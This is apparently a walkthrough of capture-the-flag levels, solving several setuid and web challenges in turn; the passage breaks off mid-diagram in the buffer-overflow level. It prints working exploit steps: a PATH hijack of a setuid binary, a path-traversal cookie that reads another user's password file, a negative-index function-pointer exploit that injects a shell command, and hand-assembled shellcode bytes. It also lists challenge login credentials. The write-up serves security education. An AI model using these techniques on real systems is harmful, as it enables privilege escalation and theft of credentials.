Ok, start by ssh-ing to level01@ec2-23-22-123-94.compute-1.amazonaws.com with
password w5kjAsSKEjCT. Our goal is to read the file .password from the level02
user's home directory: /home/level02. Let's look for low-hanging fruit - maybe
we can just read the file directly:
$ ls -l /home/level02/.password
-r-------- 1 level02 root 13 2013-09-06 05:04 /home/level02/.password
$ cat /home/level02/.password
cat: /home/level02/.password: Permission denied
Ok, well it was worth a try. Let's look at our hint: "You may find the binary
/levels/level01 and its source code /levels/level01.c useful." Good, let's
check that stuff out:
$ ls -l /levels/level01 /levels/level01.c
-r-Sr-x--- 1 level02 level01 8617 2012-03-14 09:06 /levels/level01
-r--r----- 1 level01 level01 152 2012-03-14 09:06 /levels/level01.c
Ok cool, so we found out that we have permission to execute the binary and read
the source file. There is also that curious S, which is the setuid bit (it shows
up as a capital S because the owner itself has no execute permission).
This is our first great clue at how to approach this level - it means the
level01 program will always run with the permissions of the level02 user, who
owns the file, instead of those of the user running it.
Let's start by simply running the binary:
$ /levels/level01
Current time: Fri Sep 6 04:25:06 UTC 2013
Ok, seems pretty innocuous. Let's check out the source:
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv)
{
printf("Current time: ");
fflush(stdout);
system("date");
return 0;
}
Bingo - that system("date") call is going to inherit permissions from our
binary, which we already know has access to the level02 user's password.
All we need to do is replace the date program with one of our own:
#!/bin/sh
cat /home/level02/.password
...And make it executable, so that the shell started by system can run it:
$ chmod a+x date
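Now, as long as we make sure the level01 binary finds our version of date
instead of the one from the system, we'll get the password. Since system("date")
uses a bare command name, the shell looks it up through PATH, so we put the
current directory first: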
$ PATH=.:$PATH /levels/level01
Current time: PpIFwe32ODvy
Voila!
Alright, now we log in as the level02 user with the password "PpIFwe32ODvy".
Apparently this is a web-based vulnerability, and we're directed to point our
browser at the /level02.php path on the server. I don't have port 80 open to
the server, so we'll just have to use curl locally:
$ curl http://0.0.0.0/level02.php
We get back some very friendly HTML:
<html>
<head>
<title>Level02</title>
</head>
<body>
<h1>Welcome to the challenge!</h1>
<div class="main">
<p><p>Looks like a first time user. Hello, there!</p></p>
<form action="#" method="post">
Name: <input name="name" type="text" length="40" /><br />
Age: <input name="age" type="text" length="2" /><br /><br />
<input type="submit" value="Submit!" />
</form>
</div>
</body>
</html>
Ok, let's try POSTing to the nice form:
$ curl -d "name=James&age=27" http://0.0.0.0/level02.php
Now we don't have the form, and it knows some information about us, but it still thinks we're a first time user:
<html>
<head>
<title>Level02</title>
</head>
<body>
<h1>Welcome to the challenge!</h1>
<div class="main">
<p><p>Looks like a first time user. Hello, there!</p></p>
You're James, and your age is 27 </div>
</body>
</html>
Even without looking at the source, we can guess that there is some sort of statefulness going on in this application, and in HTTP, statefulness means cookies. Let's see what the headers say:
$ curl -v -d "name=James&age=27" http://0.0.0.0/level02.php
...
< HTTP/1.1 200 OK
< Date: Fri, 06 Sep 2013 06:05:21 GMT
< Server: Apache/2.2.14 (Ubuntu)
< X-Powered-By: PHP/5.3.2-1ubuntu4.14
< Set-Cookie: user_details=acjpu4h45pxcqoz.txt
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html
...
Neat, we have a Set-Cookie in there, let's try just sending that right back:
$ curl -v -d "name=James&age=27" -H "Cookie: user_details=acjpu4h45pxcqoz.txt" http://0.0.0.0/level02.php
...
> POST /level02.php HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15
> Host: 0.0.0.0
> Accept: */*
> Cookie: user_details=acjpu4h45pxcqoz.txt
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Fri, 06 Sep 2013 06:09:42 GMT
< Server: Apache/2.2.14 (Ubuntu)
< X-Powered-By: PHP/5.3.2-1ubuntu4.14
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html
<
<html>
<head>
<title>Level02</title>
</head>
<body>
<h1>Welcome to the challenge!</h1>
<div class="main">
<p>127.0.0.1 using curl/7.19.7 (x86_64-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15</p>
You're James, and your age is 27 </div>
</body>
</html>
...
Lookie there, it no longer thinks we're a new user! It even knows our IP and user agent. Sort of spooky. Let's see what happens when we go back to our original GET, but keep our cookie:
$ curl -v -H "Cookie: user_details=acjpu4h45pxcqoz.txt" http://0.0.0.0/level02.php
<html>
<head>
<title>Level02</title>
</head>
<body>
<h1>Welcome to the challenge!</h1>
<div class="main">
<p>127.0.0.1 using curl/7.19.7 (x86_64-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15</p>
<form action="#" method="post">
Name: <input name="name" type="text" length="40" /><br />
Age: <input name="age" type="text" length="2" /><br /><br />
<input type="submit" value="Submit!" />
</form>
</div>
</body>
</html>
We get the form back, but now it knows our info. Ok, so now we actually have a
clue, before even looking at the source. The cookie has the form
user_details=<blah>.txt. I'm guessing <blah>.txt is a real file being written,
and I just bet it's owned by the level03 user, which means we might be able to
use HTTP requests with crafted cookie headers to read arbitrary files owned by
the level03 user.
Ok, let's finally look at the source. It's in /var/www/level02.php. Here are
the interesting parts:
$out = '';
if (!isset($_COOKIE['user_details'])) {
# Creates a random temp file and sets $out to be a placeholder
}
else {
$out = file_get_contents('/tmp/level02/'.$_COOKIE['user_details']);
}
# ...
<h1>Welcome to the challenge!</h1>
<div class="main">
<p><?php echo $out ?></p>
# ...
The else block and the echo $out together allow us to grab arbitrary file
contents through a simple request. We just need to set our user_details cookie
to point to a relative path from /tmp/level02/ to /home/level03/.password:
$ curl -H "Cookie: user_details=../../home/level03/.password" http://0.0.0.0/level02.php
<html>
<head>
<title>Level02</title>
</head>
<body>
<h1>Welcome to the challenge!</h1>
<div class="main">
<p>RRLQAx7iwvvH
</p>
<form action="#" method="post">
Name: <input name="name" type="text" length="40" /><br />
Age: <input name="age" type="text" length="2" /><br /><br />
<input type="submit" value="Submit!" />
</form>
</div>
</body>
</html>
BOOM.
Woot, let's log in as the level03 user with the password "RRLQAx7iwvvH". Same
drill, but this time with a binary /levels/level03 and matching source file
/levels/level03.c. Let's go straight to running it:
$ /levels/level03
Usage: ./level03 INDEX STRING
Possible indices:
[0] to_upper [1] to_lower
[2] capitalize [3] length
$ /levels/level03 0 abcd
Uppercased string: ABCD
$ /levels/level03 1 abcd
Lowercased string: abcd
$ /levels/level03 2 abcd
Capitalized string: Abcd
$ /levels/level03 3 abcd
Length of string 'abcd': 4
$ /levels/level03 4 abcd
Invalid index.
Possible indices:
[0] to_upper [1] to_lower
[2] capitalize [3] length
Ok, pretty straightforward - error handling seems reasonably good. Nothing at all obvious here. Let's hit the code. There are a few interesting sections. First, it just defines how many functions there are, a function type for them, and the functions themselves:
#define NUM_FNS 4
typedef int (*fn_ptr)(const char *);
int to_upper(const char *str) { /* ... */ }
int to_lower(const char *str) { /* ... */ }
int capitalize(const char *str) { /* ... */ }
int length(const char *str) { /* ... */ }
Then, there's the curious case of a deprecated function:
int run(const char *str)
{
// This function is now deprecated.
return system(str);
}
We'll pretty obviously want to be figuring out how to call that, but it isn't called directly anywhere in the file. Then, the relatively simple, but juicy, function that dynamically calls the proper function:
int truncate_and_call(fn_ptr *fns, int index, char *user_string)
{
char buf[64];
// Truncate supplied string
strncpy(buf, user_string, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = '\0';
return fns[index](buf);
}
The array of fn_ptrs is actually passed in from main, and is defined
statically:
fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};
Finally, the guard for the index is interesting:
index = atoi(argv[1]);
if (index >= NUM_FNS) { /* ... */ }
Pulling a few strands together, it looks like we need a way to make fns[index]
give us a reference to run, which we can then provide a string to, such as
"cat /home/level04/.password", and have it run under the level04 user's
permissions. Let's therefore look very closely at this single line fragment:
fns[index](buf). Of the three parts of that fragment, fns, index, and buf, one
is the structure we'd like to muck with and the other two are user provided.
Let's take them case by case:
buf - Can we overflow our buffer? The use of strncpy seems to make this a dead end.
fns - Can we inject the address of the run function into this structure somehow? It seems like no, because it is statically defined to point to those exact four functions.
index - Can we muck with index in a way that is clearly not intended? Actually, yes! Note that atoi returns a signed int, but the guard only rejects index values of 4 (NUM_FNS) or greater. We can pass in negative values!
So now we know our goal - we want to pass a negative value for index that will
cause the run function to be called with a command that prints us the desired
password. What fns[index] really does is *(fns + index), where each element of
fns is a 4-byte pointer, so the arithmetic moves in 4-byte steps. If fns points
to 0x10, then fns + 1 points to 0x14 and fns - 1 points to 0x0c. What we need
is to find an offset from fns that is a memory address pointing to a chunk of
4 bytes that represent the memory location of the run function. The address of
the run function is unlikely to live in memory anywhere, so we'll have to put
it there ourselves. Which means we'll first need to know where it is. There are
a few ways (that I know of) to do this:
With GDB:
$ gdb -d /levels /levels/level03
# ...
(gdb) print run
$1 = {int (const char *)} 0x804875b <run>
With objdump:
$ objdump -t /levels/level03 | grep "run$"
0804875b g F .text 00000013 run
With nm:
$ nm /levels/level03 | grep run$
0804875b T run
I prefer to use gdb, because it's useful for other stuff anyway, as we'll see
in a moment. In any case, that sucker lives at 0x804875b. That's all fine and
good, but how do we get that value into memory somewhere? Well, there's only
one thing that we (almost) fully control, and that is the memory chunk that
ends up in buf. Conveniently, that happens to be sitting on the stack just a
few short bytes up (negative!) from where fns points. Here's where gdb comes
in again, let's figure out exactly how many bytes up:
$ gdb -d /levels /levels/level03
# ...
(gdb) list
59 // Truncate supplied string
60 strncpy(buf, user_string, sizeof(buf) - 1);
61 buf[sizeof(buf) - 1] = '\0';
62 return fns[index](buf);
63 }
64
65 int main(int argc, char **argv)
66 {
67 int index;
68 fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};
(gdb) break 62
Breakpoint 1 at 0x80487a9: file level03.c, line 62.
(gdb) run 0 abcd
# ...
Breakpoint 1, truncate_and_call (fns=0xff96457c, index=0,
user_string=0xff96492c "abcd") at level03.c:62
62 return fns[index](buf);
(gdb) print fns
$1 = (fn_ptr *) 0xff96457c
(gdb) print &buf
$3 = (char (*)[64]) 0xff96450c
(gdb) print (0xff96457c - 0xff96450c) / 4
$8 = 28
Nifty! Now we know that if we input -28 for index, the value of fns[index]
will be an address constructed from the first four bytes of the string that we
input! Let's try that:
(gdb) kill
Kill the program being debugged? (y or n) y
(gdb) run -28 abcd
# ...
Breakpoint 1, truncate_and_call (fns=0xffdcc81c, index=-28,
user_string=0xffdce92c "abcd") at level03.c:62
62 return fns[index](buf);
(gdb) print fns[index]
$9 = (fn_ptr) 0x64636261
Wow, sure enough, 0x61 is the hex ASCII for the 'a' character, 0x62 is 'b',
0x63 is 'c' and 0x64 is 'd'. They're "backwards" because the x86 is a
little-endian architecture, and that's just how chunks of 4 bytes work. If we
were on a big-endian system, the sequence of bytes [ 0x61, 0x62, 0x63, 0x64 ]
would represent the 4-byte word 0x61626364, but on a little-endian system it's
the opposite. This is not a big deal at all, as long as you are aware of it.
Ok, for our next trick, let's get our run address in there instead of
0x64636261:
(gdb) run -28 "`echo -e "\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xfffd9f6c, index=-28,
user_string=0xfffdb92c "[\207\004\b") at level03.c:62
62 return fns[index](buf);
Note, I called out to echo with the -e option for interpreting escape sequences,
otherwise we would just end up with literal "\", "x", "5", "b", etc. instead of a
single byte representing the value 0x5b, etc. Also note, I listed the bytes in
"backwards" little-endian order. Let's see what this looks like in memory:
(gdb) x/64xb buf
0xfffd9efc: 0x5b 0x87 0x04 0x08 0x00 0x00 0x00 0x00
0xfffd9f04: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xfffd9f0c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xfffd9f14: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xfffd9f1c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xfffd9f24: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xfffd9f2c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xfffd9f34: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
That syntax just means "examine the first 64 hex-formatted bytes of buf". We
can see our values right there where we want them! Let's see if that translates
into getting what we want out of fns:
(gdb) print fns[index]
$1 = (fn_ptr) 0x804875b <run>
Bullseye. Let's just let the program run:
(gdb) continue
Continuing.
sh: [: not found
Program exited normally.
Ok, what happened here? Well, all we have in buf is four bytes of gobbledegook.
We called system("\x5b\x87\x04\x08"), which makes no sense. What we need to do
is make the first part of buf do real work, followed by the address of run that
our crafted index will pick up.
Let's try this: "cat /home/level04/.password;#\x5b\x87\x04\x08". We should be
sending two semi-colon-separated commands to system, the second of which is
just a comment (because of the '#' in front of it) and should have no effect:
(gdb) run -28 "`echo -e "cat /home/level04/.password;#\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xffa0fbec, index=-28,
user_string=0xffa1090f "cat /home/level04/.password;#[\207\004\b") at level03.c:62
62 return fns[index](buf);
(gdb) print fns[index]
$2 = (fn_ptr) 0x20746163
Well duh, that's not right, we added a bunch of stuff at the beginning of buf,
so we need to change our index. Let's figure out what the right value is now:
(gdb) x/64xb buf
0xffa0fb7c: 0x63 0x61 0x74 0x20 0x2f 0x68 0x6f 0x6d
0xffa0fb84: 0x65 0x2f 0x6c 0x65 0x76 0x65 0x6c 0x30
0xffa0fb8c: 0x34 0x2f 0x2e 0x70 0x61 0x73 0x73 0x77
0xffa0fb94: 0x6f 0x72 0x64 0x3b 0x23 0x5b 0x87 0x04
0xffa0fb9c: 0x08 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffa0fba4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffa0fbac: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffa0fbb4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Hmm, our bytes are there, but they aren't aligned on a word boundary, so we can't use them yet. We have two options: we could try to remove one character, or add three. Heck, let's try to remove the '#' - maybe we'll get an error, but we will have already seen the password and won't care:
(gdb) kill
Kill the program being debugged? (y or n) y
(gdb) run -28 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xffacde2c, index=-28,
user_string=0xfface910 "cat /home/level04/.password;[\207\004\b") at level03.c:62
62 return fns[index](buf);
(gdb) x/64xb buf
0xffacddbc: 0x63 0x61 0x74 0x20 0x2f 0x68 0x6f 0x6d
0xffacddc4: 0x65 0x2f 0x6c 0x65 0x76 0x65 0x6c 0x30
0xffacddcc: 0x34 0x2f 0x2e 0x70 0x61 0x73 0x73 0x77
0xffacddd4: 0x6f 0x72 0x64 0x3b 0x5b 0x87 0x04 0x08
0xffacdddc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffacdde4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffacddec: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffacddf4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Alright there we are, our bytes are in the second half of the line marked 0xffacddd4, which means they begin at the word boundary 0xffacddd8. Let's figure out what index we need to get there:
(gdb) print fns
$3 = (fn_ptr *) 0xffacde2c
(gdb) print (0xffacde2c - 0xffacddd8) / 4
$4 = 21
(gdb) print fns[-21]
$5 = (fn_ptr) 0x804875b <run>
Huzzah! Let's put it all together:
(gdb) run -21 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
Breakpoint 1, truncate_and_call (fns=0xffbc988c, index=-21,
user_string=0xffbca910 "cat /home/level04/.password;[\207\004\b") at level03.c:62
62 return fns[index](buf);
(gdb) print fns[index]
$6 = (fn_ptr) 0x804875b <run>
(gdb) c
Continuing.
cat: /home/level04/.password: Permission denied
sh: [: not found
Program exited normally.
Ah, yes, we got an error because a setuid program run under gdb doesn't get its elevated permissions - if it did, this sort of thing would be way too easy! But it definitely looks like we ran the command we expected, so let's run it outside gdb!
$ /levels/level03 -21 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
0lIhigNwu6RT
sh: [: not found
Look! A password! Whew, the game was certainly taken to a new level on this one.
Same drill - log in as level04 with password "0lIhigNwu6RT". We're looking
for a password in /home/level05/.password and we have access to the
/levels/level04 binary, which is owned by the level05 user and has setuid set,
and its source in /levels/level04.c. There is also a hint: "The vulnerabilities
overfloweth!". Oh boy. As usual, let's start by running the thing:
$ /levels/level04
Usage: ./level04 STRING
Interestingly, there's no newline at the end of the output. That seems suspicious right off the bat. Let's run with some input:
$ /levels/level04 abcd
Oh no! That didn't work!
$ /levels/level04 help
Oh no! That didn't work!
Ok, this is getting us nowhere. To the code! Alright, this one is short, so here's the whole thing:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void fun(char *str)
{
char buf[1024];
strcpy(buf, str);
}
int main(int argc, char **argv)
{
if (argc != 2) {
printf("Usage: ./level04 STRING");
exit(-1);
}
fun(argv[1]);
printf("Oh no! That didn't work!\n");
return 0;
}
Between the hint, and the use of strcpy instead of strncpy for user data, we
can quickly ascertain that we're going for a buffer overflow here. Whatever we
send for the STRING argument to the program past 1024 bytes will begin
overwriting memory that we shouldn't have access to. What to do with that
overflow seems to be the tough part. We don't have any built-in run function as
in the last level, and we need something just like it, which suggests to me
that we want to write our own version in a format that is suitable for
injecting through program input. I think the easiest way to do this is actually
to go look at what the compiled version of the run function from the previous
level looks like:
(gdb) print run
$1 = {int (const char *)} 0x804875b <run>
(gdb) set disassembly-flavor intel
(gdb) disassemble run
Dump of assembler code for function run:
0x0804875b <+0>: push ebp
0x0804875c <+1>: mov ebp,esp
0x0804875e <+3>: sub esp,0x18
0x08048761 <+6>: mov eax,DWORD PTR [ebp+0x8]
0x08048764 <+9>: mov DWORD PTR [esp],eax
0x08048767 <+12>: call 0x804847c <system@plt>
0x0804876c <+17>: leave
0x0804876d <+18>: ret
End of assembler dump.
Alright, so we know it starts at 0x0804875b and does a few things, most notably
the call to 0x0804847c, which gdb labels system@plt - the stub through which the
program reaches the C library's system function - and ends at 0x0804876d. The
rest of the function is not too clear to me, but it is probably related to the
function calling convention - we know we pass a const char * to the run
function, which at the assembly level is just going to mean we put a single
32-bit value somewhere that the procedure knows to find it. Let's log back in
as the level03 user and step through the actual instructions that call run to
see what's going on:
$ gdb -d /levels /levels/level03
# ...
(gdb) break 62
Breakpoint 1 at 0x80487a9: file level03.c, line 62.
(gdb) run -21 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xffc3242c, index=-21,
user_string=0xffc32910 "cat /home/level04/.password;[\207\004\b") at level03.c:62
62 return fns[index](buf);
(gdb) set disassembly-flavor intel
(gdb) disassemble
Dump of assembler code for function truncate_and_call:
# ... Elided beginning of function up to return from strncpy
=> 0x080487a9 <+59>: mov eax,DWORD PTR [ebp+0xc]
0x080487ac <+62>: shl eax,0x2
0x080487af <+65>: add eax,DWORD PTR [ebp-0x5c]
0x080487b2 <+68>: mov edx,DWORD PTR [eax]
0x080487b4 <+70>: lea eax,[ebp-0x4c]
0x080487b7 <+73>: mov DWORD PTR [esp],eax
0x080487ba <+76>: call edx
# ... Elided end of function
End of assembler dump.
(gdb) print fns[index]
$1 = (fn_ptr) 0x804875b <run>
(gdb) print &buf
$3 = (char (*)[64]) 0xffc323bc
So we expect to call the function at 0x0804875b with the argument 0xffc323bc. We eventually call whatever is in edx, so let's see what that is after the first few instructions of the sequence:
(gdb) stepi
0x080487ac 62 return fns[index](buf);
(gdb) stepi
0x080487af 62 return fns[index](buf);
(gdb) stepi
0x080487b2 62 return fns[index](buf);
(gdb) stepi
0x080487b4 62 return fns[index](buf);
(gdb) disassemble
Dump of assembler code for function truncate_and_call:
# ...
0x080487a9 <+59>: mov eax,DWORD PTR [ebp+0xc]
0x080487ac <+62>: shl eax,0x2
0x080487af <+65>: add eax,DWORD PTR [ebp-0x5c]
0x080487b2 <+68>: mov edx,DWORD PTR [eax]
=> 0x080487b4 <+70>: lea eax,[ebp-0x4c]
0x080487b7 <+73>: mov DWORD PTR [esp],eax
0x080487ba <+76>: call edx
# ...
End of assembler dump.
(gdb) print/x $edx
$7 = 0x804875b
Sure enough, there's the address of run, as expected. The more interesting part
is what happens with the address of buf:
(gdb) stepi
0x080487b7 62 return fns[index](buf);
(gdb) stepi
0x080487ba 62 return fns[index](buf);
(gdb) disassemble
Dump of assembler code for function truncate_and_call:
# ...
0x080487a9 <+59>: mov eax,DWORD PTR [ebp+0xc]
0x080487ac <+62>: shl eax,0x2
0x080487af <+65>: add eax,DWORD PTR [ebp-0x5c]
0x080487b2 <+68>: mov edx,DWORD PTR [eax]
0x080487b4 <+70>: lea eax,[ebp-0x4c]
0x080487b7 <+73>: mov DWORD PTR [esp],eax
=> 0x080487ba <+76>: call edx
# ...
End of assembler dump.
(gdb) x/4xb $esp
0xffc32390: 0xbc 0x23 0xc3 0xff
(gdb) x/1xw $esp
0xffc32390: 0xffc323bc
Oh, hello there &buf - it's simply been put on the top of the stack. The
standard C calling convention just pushes arguments on the stack, in reverse
order, but since we only have one argument, it's right on the top. Let's revisit
the run function with this knowledge:
(gdb) stepi
run (str=0xffc323bc "cat /home/level04/.password;[\207\004\b") at level03.c:51
51 {
(gdb) disassemble
Dump of assembler code for function run:
=> 0x0804875b <+0>: push ebp
0x0804875c <+1>: mov ebp,esp
0x0804875e <+3>: sub esp,0x18
0x08048761 <+6>: mov eax,DWORD PTR [ebp+0x8]
0x08048764 <+9>: mov DWORD PTR [esp],eax
0x08048767 <+12>: call 0x804847c <system@plt>
0x0804876c <+17>: leave
0x0804876d <+18>: ret
End of assembler dump.
(gdb) stepi
0x0804875c 51 {
(gdb) stepi
0x0804875e 51 {
(gdb) stepi
53 return system(str);
(gdb) stepi
0x08048764 53 return system(str);
(gdb) stepi
0x08048767 53 return system(str);
(gdb) disassemble
Dump of assembler code for function run:
0x0804875b <+0>: push ebp
0x0804875c <+1>: mov ebp,esp
0x0804875e <+3>: sub esp,0x18
0x08048761 <+6>: mov eax,DWORD PTR [ebp+0x8]
0x08048764 <+9>: mov DWORD PTR [esp],eax
=> 0x08048767 <+12>: call 0x804847c <system@plt>
0x0804876c <+17>: leave
0x0804876d <+18>: ret
End of assembler dump.
(gdb) x/1xw $esp
0xffc32370: 0xffc323bc
So all we really did was create ourselves a new 24-byte (six-word) stack frame
with sub esp,0x18 (I don't really know why, since we're only using one word of
it; my guess is that the compiler is keeping the stack aligned), and then store
the location of our buffer at the top of it.
What we've learned from all of this is that in order to call the system
function, all we really need to do is push the location of our buffer onto the
stack and call into the absolute location of system in our object. Of course,
we need actual machine code to do these things. Honestly, I think the easiest
way to do this is to just write what we want locally, run it through an
assembler, and pick out the parts we're interested in. Here are the
instructions we want, using the values from the level03 example, which we'll
have to change later:
push DWORD 0xffc323bc ; Push our buffer address onto the stack
mov eax, 0x0804847c ; Move `system`s address into a register
call eax ; Call `system`
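We can't just call 0x0804847c, because an immediate operand to the call
instruction is always encoded as a relative offset - it works to write that
code, but nasm is cleverly translating our absolute address into a relative one
at assembly time, and that offset would be wrong once the bytes are copied to a
different address. Loading the absolute address into a register and calling
through the register avoids the problem.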
One easy way to get the right machine code out of those instructions is to put
them into a program we can run and inspect in gdb. Let's make a file named
callsystem.asm:
SECTION .data
SECTION .bss
SECTION .text
global _start
_start:
push DWORD 0xffc323bc ; Push our buffer address onto the stack
mov eax, 0x804847c ; Move `system`s address into a register
call eax ; Call `system`
mov eax, 1 ; `exit` syscall
mov ebx, 0 ; Exit code 0
int 0x80 ; Exit
You'll need the nasm assembler locally to make anything out of that, and we'll need to know what our target is. We can figure that out by looking at what kinds of binaries we've been working with thus far:
$ file /levels/level04
/levels/level04: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
We can assemble callsystem.asm into a 32-bit ELF object with debug symbols
using nasm (the -f elf32 matters, since nasm emits a flat binary by default),
and link it into an executable with ld:
nasm -f elf32 -g -o callsystem.o callsystem.asm
ld -o callsystem callsystem.o
Now we can attach gdb and look around:
$ gdb ./callsystem
(gdb) break _start
Breakpoint 1 at 0x8048060
(gdb) set disassembly-flavor intel
(gdb) run
Starting program: /vagrant/bin/hello
Breakpoint 1, 0x08048060 in _start ()
(gdb) disassemble
Dump of assembler code for function _start:
=> 0x08048060 <+0>: push 0xffc323bc
0x08048065 <+5>: mov eax,0x804847c
0x0804806a <+10>: call eax
0x0804806c <+12>: mov eax,0x1
0x08048071 <+17>: mov ebx,0x0
0x08048076 <+22>: int 0x80
End of assembler dump.
Ok, so we have a 5-byte push operation, a 5-byte mov and a 2-byte call. Let's see what they look like:
(gdb) x/5xb 0x08048060
0x8048060 <_start>: 0x68 0xbc 0x23 0xc3 0xff
(gdb) x/5xb 0x08048065
0x8048065 <_start+5>: 0xb8 0x7c 0x84 0x04 0x08
(gdb) x/2xb 0x0804806a
0x804806a <_start+10>: 0xff 0xd0
(gdb) x/12xb 0x08048060
0x8048060 <_start>: 0x68 0xbc 0x23 0xc3 0xff 0xb8 0x7c 0x84
0x8048068 <_start+8>: 0x04 0x08 0xff 0xd0
It's encouraging to see our literal 0xffc323bc and 0x0804847c values peeking
through - we'll be changing those values eventually. Let's get this into a
string using echo -e as before:
$ echo -e "\x68\xbc\x23\xc3\xff\xb8\x7c\x84\x04\x08\xff\xd0"
h�#���|��
Good, it should look like nonsense. There are lots of other ways to get this
information than building a little runnable binary and attaching gdb to it. I'll
describe one easy way. First make a simpler.asm file:
SECTION .text
push DWORD 0xffc323bc ; Push our buffer address onto the stack
mov eax, 0x804847c ; Move `system`s address into a register
call eax ; Call `system`
Assemble it with nasm -f elf32 -o simpler.o simpler.asm and use objdump to see
what's in simpler.o:
$ objdump -s simpler.o
simpler.o: file format elf32-i386
Contents of section .text:
0000 68bc23c3 ffb87c84 0408ffd0 h.#...|.....
Since the only thing in our object file is the code for our instructions, the
entirety of the contents of the .text section is what we need. The 0000 at the
beginning is just the address, the rest of the hex are our bytes. Notice that
they're identical to what we found using gdb.
Alright, it's finally time to start mucking around with the level04 program
itself. Let's get in there with gdb and poke around:
$ gdb -d /levels /levels/level04
# ...
Reading symbols from /levels/level04...(no debugging symbols found)...done.
(gdb) list
No symbol table is loaded. Use the "file" command.
Bummer. Hopefully we can rely purely on the source and disassembly to figure
things out. Let's get in there and see what fun looks like:
(gdb) break fun
Breakpoint 1 at 0x804848d
(gdb) run abcd
Breakpoint 1, 0x0804848d in fun ()
(gdb) disassemble
Dump of assembler code for function fun:
0x08048484 <+0>: push ebp
0x08048485 <+1>: mov ebp,esp
0x08048487 <+3>: sub esp,0x418
=> 0x0804848d <+9>: mov eax,DWORD PTR [ebp+0x8]
0x08048490 <+12>: mov DWORD PTR [esp+0x4],eax
0x08048494 <+16>: lea eax,[ebp-0x408]
0x0804849a <+22>: mov DWORD PTR [esp],eax
0x0804849d <+25>: call 0x8048388 <strcpy@plt>
0x080484a2 <+30>: leave
0x080484a3 <+31>: ret
End of assembler dump.
This whole thing is pretty much just interacting with the stack (I'm noticing a trend...), and it's confusing and important for what we're doing, so I'm going to draw some pictures of the stack. On entry, it looks like this:
esp ebp Address Value
| |
| |
| | +------------+------------+
| +--->| 0xffa3f218 | 0xffa3f298 | <-+
| +------------+------------+ |
| . | `main`s
| . | stack
| . | frame
| +------------+------------+ |
| | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| +------------+------------+ |
+-------->| 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
+------------+------------+
The first thing that happens is a standard stack-frame creation preamble. First,
the current ebp is saved onto the stack with push ebp. Now it looks like this:
esp ebp Address Value
| | +------------+------------+
| +--->| 0xffa3f218 | 0xffa3f298 | <-+
| +------------+------------+ |
| . | `main`s
| . | stack
| . | frame
| +------------+------------+ |
| | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| +------------+------------+ |
| | 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
| +------------+------------+
+-------->| 0xffa3f1f8 | 0xffa3f218 |
+------------+------------+
Then, ebp is moved to the current stack position with mov ebp, esp:
esp ebp Address Value
| | +------------+------------+
| | | 0xffa3f218 | 0xffa3f298 | <-+
| | +------------+------------+ |
| | . | `main`s
| | . | stack
| | . | frame
| | +------------+------------+ |
| | | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| | +------------+------------+ |
| | | 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
| | +------------+------------+
+----+--->| 0xffa3f1f8 | 0xffa3f218 |
+------------+------------+
Finally, fun allocates a 1048-byte stack frame with sub esp, 0x418:
esp ebp Address Value
| | +------------+------------+
| | | 0xffa3f218 | 0xffa3f298 | <-+
| | +------------+------------+ |
| | . | `main`s
| | . | stack
| | . | frame
| | +------------+------------+ |
| | | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| | +------------+------------+ |
| | | 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
| | +------------+------------+
| +--->| 0xffa3f1f8 | 0xffa3f218 | <-+
| +------------+------------+ |
| . | `fun`s
| . | stack
| . | frame
| +------------+------------+ |
+-------->| 0xffa3ede0 | 0x???????? | <-+
+------------+------------+
Either for alignment reasons, or just to rub in how dumb I am, the compiler
allocates 1024 bytes of the stack frame for buf, starting after two empty
words under the top of the frame. The frame ends with two more inexplicable
blank words, and two words which are eventually used to pass the two arguments
to strcpy:
esp ebp Address Value
| | +------------+------------+
